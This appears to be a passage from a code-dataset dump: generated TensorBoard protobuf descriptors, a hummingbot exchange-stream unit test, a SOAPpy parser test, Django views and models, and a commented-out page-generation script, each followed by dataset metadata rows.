_descriptor.EnumValueDescriptor(
name='VERDICT_UNKNOWN', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_OK', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_WARN', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_ERROR', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1049,
serialized_end=1145,
)
_sym_db.RegisterEnumDescriptor(_COMPATIBILITYVERDICT)
CompatibilityVerdict = enum_type_wrapper.EnumTypeWrapper(_COMPATIBILITYVERDICT)
VERDICT_UNKNOWN = 0
VERDICT_OK = 1
VERDICT_WARN = 2
VERDICT_ERROR = 3
_SERVERINFOREQUEST = _descriptor.Descriptor(
name='ServerInfoRequest',
full_name='tensorboard.service.ServerInfoRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='version', full_name='tensorboard.service.ServerInfoRequest.version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='plugin_specification', full_name='tensorboard.service.ServerInfoRequest.plugin_specification', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=69,
serialized_end=177,
)
_SERVERINFORESPONSE = _descriptor.Descriptor(
name='ServerInfoResponse',
full_name='tensorboard.service.ServerInfoResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='compatibility', full_name='tensorboard.service.ServerInfoResponse.compatibility', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='api_server', full_name='tensorboard.service.ServerInfoResponse.api_server', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url_format', full_name='tensorboard.service.ServerInfoResponse.url_format', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='plugin_control', full_name='tensorboard.service.ServerInfoResponse.plugin_control', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='upload_limits', full_name='tensorboard.service.ServerInfoResponse.upload_limits', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=180,
serialized_end=491,
)
_COMPATIBILITY = _descriptor.Descriptor(
name='Compatibility',
full_name='tensorboard.service.Compatibility',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='verdict', full_name='tensorboard.service.Compatibility.verdict', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='details', full_name='tensorboard.service.Compatibility.details', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=493,
serialized_end=585,
)
_APISERVER = _descriptor.Descriptor(
name='ApiServer',
full_name='tensorboard.service.ApiServer',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='endpoint', full_name='tensorboard.service.ApiServer.endpoint', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=587,
serialized_end=616,
)
_EXPERIMENTURLFORMAT = _descriptor.Descriptor(
name='ExperimentUrlFormat',
full_name='tensorboard.service.ExperimentUrlFormat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='template', full_name='tensorboard.service.ExperimentUrlFormat.template', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id_placeholder', full_name='tensorboard.service.ExperimentUrlFormat.id_placeholder', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=618,
serialized_end=681,
)
_PLUGINSPECIFICATION = _descriptor.Descriptor(
name='PluginSpecification',
full_name='tensorboard.service.PluginSpecification',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='upload_plugins', full_name='tensorboard.service.PluginSpecification.upload_plugins', index=0,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=683,
serialized_end=728,
)
_PLUGINCONTROL = _descriptor.Descriptor(
name='PluginControl',
full_name='tensorboard.service.PluginControl',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='allowed_plugins', full_name='tensorboard.service.PluginControl.allowed_plugins', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=730,
serialized_end=770,
)
_UPLOADLIMITS = _descriptor.Descriptor(
name='UploadLimits',
full_name='tensorboard.service.UploadLimits',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='max_scalar_request_size', full_name='tensorboard.service.UploadLimits.max_scalar_request_size', index=0,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_tensor_request_size', full_name='tensorboard.service.UploadLimits.max_tensor_request_size', index=1,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_blob_request_size', full_name='tensorboard.service.UploadLimits.max_blob_request_size', index=2,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_scalar_request_interval', full_name='tensorboard.service.UploadLimits.min_scalar_request_interval', index=3,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_tensor_request_interval', full_name='tensorboard.service.UploadLimits.min_tensor_request_interval', index=4,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_blob_request_interval', full_name='tensorboard.service.UploadLimits.min_blob_request_interval', index=5,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_blob_size', full_name='tensorboard.service.UploadLimits.max_blob_size', index=6,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_tensor_point_size', full_name='tensorboard.service.UploadLimits.max_tensor_point_size', index=7,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=773,
serialized_end=1047,
)
_SERVERINFOREQUEST.fields_by_name['plugin_specification'].message_type = _PLUGINSPECIFICATION
_SERVERINFORESPONSE.fields_by_name['compatibility'].message_type = _COMPATIBILITY
_SERVERINFORESPONSE.fields_by_name['api_server'].message_type = _APISERVER
_SERVERINFORESPONSE.fields_by_name['url_format'].message_type = _EXPERIMENTURLFORMAT
_SERVERINFORESPONSE.fields_by_name['plugin_control'].message_type = _PLUGINCONTROL
_SERVERINFORESPONSE.fields_by_name['upload_limits'].message_type = _UPLOADLIMITS
_COMPATIBILITY.fields_by_name['verdict'].enum_type = _COMPATIBILITYVERDICT
DESCRIPTOR.message_types_by_name['ServerInfoRequest'] = _SERVERINFOREQUEST
DESCRIPTOR.message_types_by_name['ServerInfoResponse'] = _SERVERINFORESPONSE
DESCRIPTOR.message_types_by_name['Compatibility'] = _COMPATIBILITY
DESCRIPTOR.message_types_by_name['ApiServer'] = _APISERVER
DESCRIPTOR.message_types_by_name['ExperimentUrlFormat'] = _EXPERIMENTURLFORMAT
DESCRIPTOR.message_types_by_name['PluginSpecification'] = _PLUGINSPECIFICATION
DESCRIPTOR.message_types_by_name['PluginControl'] = _PLUGINCONTROL
DESCRIPTOR.message_types_by_name['UploadLimits'] = _UPLOADLIMITS
DESCRIPTOR.enum_types_by_name['CompatibilityVerdict'] = _COMPATIBILITYVERDICT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ServerInfoRequest = _reflection.GeneratedProtocolMessageType('ServerInfoRequest', (_message.Message,), {
'DESCRIPTOR' : _SERVERINFOREQUEST,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ServerInfoRequest)
})
_sym_db.RegisterMessage(ServerInfoRequest)
ServerInfoResponse = _reflection.GeneratedProtocolMessageType('ServerInfoResponse', (_message.Message,), {
'DESCRIPTOR' : _SERVERINFORESPONSE,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ServerInfoResponse)
})
_sym_db.RegisterMessage(ServerInfoResponse)
Compatibility = _reflection.GeneratedProtocolMessageType('Compatibility', (_message.Message,), {
'DESCRIPTOR' : _COMPATIBILITY,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.Compatibility)
})
_sym_db.RegisterMessage(Compatibility)
ApiServer = _reflection.GeneratedProtocolMessageType('ApiServer', (_message.Message,), {
'DESCRIPTOR' : _APISERVER,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ApiServer)
})
_sym_db.RegisterMessage(ApiServer)
ExperimentUrlFormat = _reflection.GeneratedProtocolMessageType('ExperimentUrlFormat', (_message.Message,), {
'DESCRIPTOR' : _EXPERIMENTURLFORMAT,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ExperimentUrlFormat)
})
_sym_db.RegisterMessage(ExperimentUrlFormat)
PluginSpecification = _reflection.GeneratedProtocolMessageType('PluginSpecification', (_message.Message,), {
'DESCRIPTOR' : _PLUGINSPECIFICATION,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.PluginSpecification)
})
_sym_db.RegisterMessage(PluginSpecification)
PluginControl = _reflection.GeneratedProtocolMessageType('PluginControl', (_message.Message,), {
'DESCRIPTOR' : _PLUGINCONTROL,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.PluginControl)
})
_sym_db.RegisterMessage(PluginControl)
UploadLimits = _reflection.GeneratedProtocolMessageType('UploadLimits', (_message.Message,), {
'DESCRIPTOR' : _UPLOADLIMITS,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.UploadLimits)
})
_sym_db.RegisterMessage(UploadLimits)
# @@protoc_insertion_point(module_scope)
| 40.127572 | 1,788 | 0.762383 | 2,310 | 19,502 | 6.133766 | 0.099134 | 0.044604 | 0.053356 | 0.056885 | 0.624674 | 0.526007 | 0.509281 | 0.509281 | 0.478157 | 0.463547 | 0 | 0.032963 | 0.117988 | 19,502 | 485 | 1,789 | 40.210309 | 0.790768 | 0.040816 | 0 | 0.642202 | 1 | 0.002294 | 0.253263 | 0.199979 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013761 | 0 | 0.013761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0e677bb51b35c500b63970611b9dbe8b1db2dde6 | 292 | py | Python | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | 1 | 2020-07-17T09:25:42.000Z | 2020-07-17T09:25:42.000Z | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def hello(request):
return HttpResponse("Hello world")
def date(request, year, month, day):
return HttpResponse({
year: year,
month: month,
day: day
})
| 17.176471 | 38 | 0.660959 | 35 | 292 | 5.514286 | 0.571429 | 0.103627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 292 | 16 | 39 | 18.25 | 0.881279 | 0.078767 | 0 | 0 | 0 | 0 | 0.041199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
0e7dc78c76ad3448f8b2889d760c4e349ce77e58 | 1,429 | py | Python | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 542 | 2021-12-17T22:34:31.000Z | 2022-03-31T14:36:23.000Z | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 291 | 2021-12-17T20:07:53.000Z | 2022-03-31T11:07:23.000Z | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 220 | 2021-12-17T12:41:23.000Z | 2022-03-31T23:03:22.000Z | #!/usr/bin/env python
import sys
import asyncio
import logging
import unittest
import conf
from os.path import join, realpath
from hummingbot.connector.exchange.altmarkets.altmarkets_user_stream_tracker import AltmarketsUserStreamTracker
from hummingbot.connector.exchange.altmarkets.altmarkets_auth import AltmarketsAuth
from hummingbot.core.utils.async_utils import safe_ensure_future
from hummingbot.logger.struct_logger import METRICS_LOG_LEVEL
sys.path.insert(0, realpath(join(__file__, "../../../../../")))
logging.basicConfig(level=METRICS_LOG_LEVEL)
class AltmarketsUserStreamTrackerUnitTest(unittest.TestCase):
api_key = conf.altmarkets_api_key
api_secret = conf.altmarkets_secret_key
@classmethod
def setUpClass(cls):
cls.ev_loop: asyncio.BaseEventLoop = asyncio.get_event_loop()
cls.trading_pairs = ["BTC-USD"]
cls.user_stream_tracker: AltmarketsUserStreamTracker = AltmarketsUserStreamTracker(
altmarkets_auth=AltmarketsAuth(cls.api_key, cls.api_secret),
trading_pairs=cls.trading_pairs)
cls.user_stream_tracker_task: asyncio.Task = safe_ensure_future(cls.user_stream_tracker.start())
def test_user_stream(self):
# Wait process some msgs.
print("\nSleeping for 30s to gather some user stream messages.")
self.ev_loop.run_until_complete(asyncio.sleep(30.0))
print(self.user_stream_tracker.user_stream)
| 37.605263 | 111 | 0.773268 | 177 | 1,429 | 5.971751 | 0.446328 | 0.075686 | 0.080416 | 0.056764 | 0.0965 | 0.0965 | 0 | 0 | 0 | 0 | 0 | 0.004882 | 0.139958 | 1,429 | 37 | 112 | 38.621622 | 0.855167 | 0.030791 | 0 | 0 | 0 | 0 | 0.055676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.37037 | 0 | 0.555556 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0e88cbb20b73b185549520afd3dddebdd1c5d349 | 881 | py | Python | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 1 | 2015-01-19T02:11:57.000Z | 2015-01-19T02:11:57.000Z | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 2 | 2017-02-03T20:11:57.000Z | 2019-09-09T19:10:49.000Z | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 3 | 2016-04-22T17:38:29.000Z | 2019-08-13T14:38:37.000Z | #!/usr/bin/env python
import sys
sys.path.insert(1, "..")
from SOAPpy.Errors import Error
from SOAPpy.Parser import parseSOAPRPC
original = """<?xml version="1.0"?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<doSingleRecord SOAP-ENC:root="1">
</doSingleRecord>
</SOAP-ENV:Body>
<ErrorString>The CustomerID tag could not be found or the number contained in the tag was invalid</ErrorString></SOAP-ENV:Envelope>
"""
try:
parseSOAPRPC(original, attrs = 1)
except Error, e:
if e.msg != "expected nothing, got `ErrorString'":
raise AssertionError, "Incorrect error message generated: " + e.msg
else:
raise AssertionError, "Incorrect error message generated"
print "Success"
| 30.37931 | 132 | 0.725312 | 120 | 881 | 5.325 | 0.525 | 0.065728 | 0.084507 | 0.098592 | 0.323944 | 0.28482 | 0.131455 | 0.131455 | 0 | 0 | 0 | 0.006494 | 0.125993 | 881 | 28 | 133 | 31.464286 | 0.823377 | 0.022701 | 0 | 0 | 0 | 0.043478 | 0.660465 | 0.047674 | 0 | 0 | 0 | 0 | 0.086957 | 0 | null | null | 0 | 0.130435 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0e97bd1c773c1a5622d071293cbf5def12d114a3 | 3,101 | py | Python | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 3 | 2017-06-10T15:49:47.000Z | 2019-03-15T10:04:31.000Z | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 11 | 2017-06-05T20:19:32.000Z | 2018-06-16T21:03:37.000Z | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 2 | 2017-07-17T18:03:45.000Z | 2021-11-12T03:36:58.000Z | from django.db import models
# Description of an object in the arena
class Entity(models.Model):
    entityId = models.AutoField(primary_key=True)
    entityClass = models.CharField(max_length=30)
    entityName = models.CharField(max_length=30, null=True, blank=True)
    entityCategory = models.CharField(max_length=30, null=True, blank=True)
    entityColor = models.CharField(max_length=30, null=True, blank=True)
    entityWeight = models.FloatField(default=None, null=True, blank=True)
    entitySize = models.FloatField(default=None, null=True, blank=True)
    entityIsRoom = models.BooleanField(default=False, blank=True)
    entityIsWaypoint = models.BooleanField(default=False, blank=True)
    entityIsContainer = models.BooleanField(default=False, blank=True)
    entityGotPosition = models.BooleanField(default=False, blank=True)
    # The position of the object in space, if available
    entityPosX = models.FloatField(default=None, null=True, blank=True)
    entityPosY = models.FloatField(default=None, null=True, blank=True)
    entityPosZ = models.FloatField(default=None, null=True, blank=True)
    entityPosYaw = models.FloatField(default=None, null=True, blank=True)
    entityPosPitch = models.FloatField(default=None, null=True, blank=True)
    entityPosRoll = models.FloatField(default=None, null=True, blank=True)
    # The position to reach in order to be able to grasp the object
    entityWaypointX = models.FloatField(default=None, null=True, blank=True)
    entityWaypointY = models.FloatField(default=None, null=True, blank=True)
    entityWaypointYaw = models.FloatField(default=None, null=True, blank=True)
    # Just for the serializer
    depth_waypoint = models.IntegerField(null=True, blank=True)
    depth_position = models.IntegerField(null=True, blank=True)
    entityContainer = models.ForeignKey('self', on_delete=models.SET_NULL, null=True, blank=True)

    def __str__(self):
        return self.entityClass + " - " + str(self.entityId)


# Description of a person in the arena
class People(models.Model):
    peopleId = models.AutoField(primary_key=True)
    peopleRecognitionId = models.IntegerField(null=True, blank=True, unique=True)
    peopleName = models.CharField(max_length=30, null=True, blank=True)
    peopleAge = models.IntegerField(null=True, blank=True)
    peopleColor = models.CharField(max_length=30, null=True, blank=True)
    peoplePose = models.CharField(max_length=30, null=True, blank=True)
    peoplePoseAccuracy = models.FloatField(default=None, null=True, blank=True)
    peopleEmotion = models.CharField(max_length=30, null=True, blank=True)
    peopleEmotionAccuracy = models.FloatField(default=None, null=True, blank=True)
    peopleGender = models.CharField(max_length=10, null=True, blank=True)
    peopleGenderAccuracy = models.FloatField(default=None, null=True, blank=True)
    peopleIsOperator = models.BooleanField(default=False)

    def __str__(self):
        return str(self.peopleId) + "(" + str(
            self.peopleRecognitionId) + ") - " + self.peopleGender + " - " + self.peopleColor + " - " + self.peoplePose
| 46.984848 | 119 | 0.741696 | 377 | 3,101 | 6.039788 | 0.236074 | 0.12253 | 0.15415 | 0.201581 | 0.60123 | 0.564339 | 0.434343 | 0.434343 | 0.132191 | 0 | 0 | 0.006798 | 0.146082 | 3,101 | 65 | 120 | 47.707692 | 0.853097 | 0.063528 | 0 | 0.046512 | 0 | 0 | 0.006211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.023256 | 0.046512 | 0.976744 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0ea75c30072eee31077e1649933e02a8c3a47e21 | 2,617 | py | Python | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
] | null | null | null | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
] | null | null | null | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
] | 1 | 2020-11-10T07:22:42.000Z | 2020-11-10T07:22:42.000Z | # from django.shortcuts import render
# import os
# from django.conf import settings
# from goods.models import SKU
# from contents.utils import get_categories
# from goods.utils import get_breadcrumb
#
# def generate_static_sku_detail_html(sku_id):
#
#     sku = SKU.objects.get(id=sku_id)
#
#     category = sku.category  # third-level category data
#     spu = sku.spu
#
#     """1. Prepare the spec option list of the current product, e.g. [8, 11]"""
#     # Get the spec option id list of the SKU currently being displayed
#     current_sku_spec_qs = sku.specs.order_by('spec_id')
#     current_sku_option_ids = []  # [8, 11]
#     for current_sku_spec in current_sku_spec_qs:
#         current_sku_option_ids.append(current_sku_spec.option_id)
#
#     """2. Build the spec selection map
#     {(8, 11): 3, (8, 12): 4, (9, 11): 5, (9, 12): 6, (10, 11): 7, (10, 12): 8}
#     """
#     # Build the spec selection map
#     temp_sku_qs = spu.sku_set.all()  # get all SKUs under the current SPU
#     # Dict mapping option-id tuples to SKU ids
#     spec_sku_map = {}  # {(8, 11): 3, (8, 12): 4, (9, 11): 5, (9, 12): 6, (10, 11): 7, (10, 12): 8}
#     for temp_sku in temp_sku_qs:
#         # Query the spec data of each SKU
#         temp_spec_qs = temp_sku.specs.order_by('spec_id')
#         temp_sku_option_ids = []  # holds the option values of each SKU
#         for temp_spec in temp_spec_qs:
#             temp_sku_option_ids.append(temp_spec.option_id)
#         spec_sku_map[tuple(temp_sku_option_ids)] = temp_sku.id
#
#     """3. Combine options and bind the matching sku_id"""
#     spu_spec_qs = spu.specs.order_by('id')  # get all specs of the current SPU
#
#     for index, spec in enumerate(spu_spec_qs):  # iterate over all specs
#         spec_option_qs = spec.options.all()  # get all options of the current spec
#         temp_option_ids = current_sku_option_ids[:]  # copy the displayed product's spec option list
#         for option in spec_option_qs:  # iterate over all options of this spec
#             temp_option_ids[index] = option.id  # e.g. [8, 12]
#             option.sku_id = spec_sku_map.get(tuple(temp_option_ids))  # bind a sku_id attribute to each option object
#
#         # spec.spec_options = spec_option_qs  # bind all options of the spec to its spec_options attribute
#
#     context = {
#         'categories': get_categories(),  # product categories
#         'breadcrumb': get_breadcrumb(category),  # breadcrumb navigation
#         'sku': sku,  # the SKU model instance to display
#         'category': category,  # the third-level category the displayed SKU belongs to
#         'spu': spu,  # the SPU the SKU belongs to
#         'spec_qs': spu_spec_qs,  # all spec data for the current product
#     }
#
#     response = render(None, 'detail.html', context)
#     html_text = response.content.decode()
#     file_path = os.path.join(settings.STATICFILES_DIRS[0], 'detail/' + str(sku_id) + '.html')
#     with open(file_path, 'w') as f:
#         f.write(html_text)
#
#
# if __name__ == '__main__':
#     skus = SKU.objects.all()
#     for sku in skus:
#         print(sku.id)
#         generate_static_sku_detail_html(sku.id)
0eafba60413846c138910dc0d814f1ad191425ea | 1,841 | py | Python | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | 1 | 2020-10-01T01:07:11.000Z | 2020-10-01T01:07:11.000Z | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
